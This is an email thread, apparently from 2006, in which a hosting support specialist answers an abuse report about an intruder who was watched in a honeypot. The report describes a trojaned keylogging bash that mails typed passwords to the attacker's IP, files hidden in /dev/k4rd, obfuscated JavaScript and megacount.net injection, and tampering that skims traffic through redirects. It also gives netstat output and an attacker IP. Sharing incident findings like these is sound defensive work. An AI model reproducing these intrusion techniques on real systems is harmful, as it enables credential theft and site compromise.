Chris,

What kind of activity are you seeing once he's in the servers? At Webair we're primarily web hosting, and some customer boxes were compromised over recent months.

I'm curious because you say he was very patient and methodical. I've asked around with a few friends and they have seen this guy too.. just as in your case

Anyway, it fits the profile of the guy we had. He was inserting references to megacount.net, and some obfuscated javascript code. He has been hard to get rid of..

Sincerely,

---------------------------------------- Brian Hourigan Lead Technical Support Specialist/ Programming Development Team Webair Internet Development, Inc. Fax: 516.938.5100 http://www.webair.com ---------------------------------------- We are interested in any feedback you might have about the service you received. Please contact our technical support consumer care manager directly 1.866.WEBAIR1 or e-mail customercare@webair.com

On Sun, 29 Oct 2006, Chris Jester wrote:

...

65.110.62.120

Sagonet,

We have a serious hacker here who is ACTIVLY engaged in logins on our network (have him in a honeypot at the moment). He is running exploits from your network and also I have been hearing from others that you have been notified of this a few times yet have done nothing about it. Can we get someone to handle this immediately please?

This hacker has rooted at least 35 servers on a friends network (friendly competitor) and now hes scanning ours...

This is what was said by my friend after contacting you guys about this: "Good... They will not listen... I have provided them logs, screen shots, etc..."

Additionally, I would LOVE to know what is on that server... this guy is not to be taken lightly, he is VERY methodical and patient. He's problably owning your network too.

[root@mail /home]# netstat -an Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN tcp 0 0 :::38300 :::* LISTEN tcp 0 0 ::ffff:66.11.112.15:38300 ::ffff:65.110.62.120:59979 ESTABLISHED ESTABLISHED

In the honeypot server we have him in, he is storing files in /dev/k4rd Bash has been replaced with a "key logging" bash, het gets everything you type, passwords included, emailed back to him at root@65.110.62.120 There seems to be ALOT of files in /dev/k4rd, a bin directory and etc. He hacked the kernel so good that its VERY difficult to track his moves without booting off another drive first. We boot off a live linux cd enviornment to do studies on what he is up to, but before we do that we let him hack it up nicely so we get all his tricks. Note: he cannot really touch any other servers as he is stuck in a faked network enviornment at this moment. Pinging yahoo.com for example will generate a reply and a faked dns entry, but the packets never leave the zone he is in. His motivation seems to be to gather nats affilaite and customer data. He has an exploit that works on any and all nats installations. Were not going to release that until nats has been notified and had time to secure it. Were also seeing "traffic skimming" being attempted. He is searching for scripts (that we put there just to see what he does with them) that log traffic hits and etc.... He modifies these scripts so that randomly, but rarely, hits are re-directed to a web site called cgi-dnsl.com ( porn ). I dont mean to be a brat to Sagonet, but this is always the source of this hacker and his home never changes, its always on that single ip. Chris Jester NJesterIII